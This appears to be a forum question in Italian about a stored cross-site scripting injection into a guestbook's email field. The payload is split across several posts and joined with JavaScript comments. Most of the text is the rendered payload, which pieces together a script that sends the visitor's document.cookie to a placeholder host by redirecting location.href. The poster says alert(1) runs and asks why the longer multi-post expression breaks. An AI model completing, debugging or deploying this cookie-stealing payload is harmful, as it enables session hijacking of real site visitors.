<a href='mailto:</a><script>/*'></a><script>/*</a>:
<br>
<hr>
<a href='mailto:*/location.href=/*'>*/location.href=/*</a>:
<br>
<hr>
<a href='mailto:*/"http://127.0.0.1/"/*'>*/"http://127.0.0.1/"/*</a>:
<br>
<hr>
<a href='mailto:*/+document.cookie;/*'>*/+document.cookie;/*</a>:
<br>
<hr>
<a href='mailto:*/</script><a>'>*/</script><a></a>
Sto facendo l'iniezione in una configurazione del guestbook in cui viene iniettato l'XSS cambiando l'indirizzo email. La lunghezza massima dell'email è abbastanza breve da dover essere distribuita su più post. Durante il test, sono in grado di eseguire alert (1); ma quando devo diffondere un'espressione più complicata su più righe, le cose si spezzano. Cosa mi manca?